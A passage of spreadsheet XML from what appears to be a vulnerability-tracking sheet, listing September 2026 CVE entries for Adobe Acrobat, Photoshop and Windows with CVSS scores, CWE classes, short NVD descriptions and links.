      <c r="D661" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S664" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S666" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S670" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S671" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83954</t>
        </is>
      </c>
      <c r="D675" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E675" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F675" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G675" s="5" t="inlineStr"/>
      <c r="H675" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I675" s="5" t="inlineStr"/>
      <c r="J675" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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75" s="5" t="inlineStr"/>
      <c r="M675" s="5" t="inlineStr"/>
      <c r="N675" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O675" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P675" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q675" s="5" t="inlineStr"/>
      <c r="R675" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S675" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83954</t>
        </is>
      </c>
    </row>
    <row r="676">
      <c r="A676" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83955</t>
        </is>
      </c>
      <c r="D676" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E676" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F676" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G676" s="5" t="inlineStr"/>
      <c r="H676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I676" s="5" t="inlineStr"/>
      <c r="J676" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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76" s="5" t="inlineStr"/>
      <c r="M676" s="5" t="inlineStr"/>
      <c r="N676" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O676" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P676" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q676" s="5" t="inlineStr"/>
      <c r="R676" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S676" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T676" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83955</t>
        </is>
      </c>
    </row>
    <row r="677">
      <c r="A677" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C677" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83967</t>
        </is>
      </c>
      <c r="D677" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E677" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F677" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G677" s="5" t="inlineStr"/>
      <c r="H677" s="5" t="n">
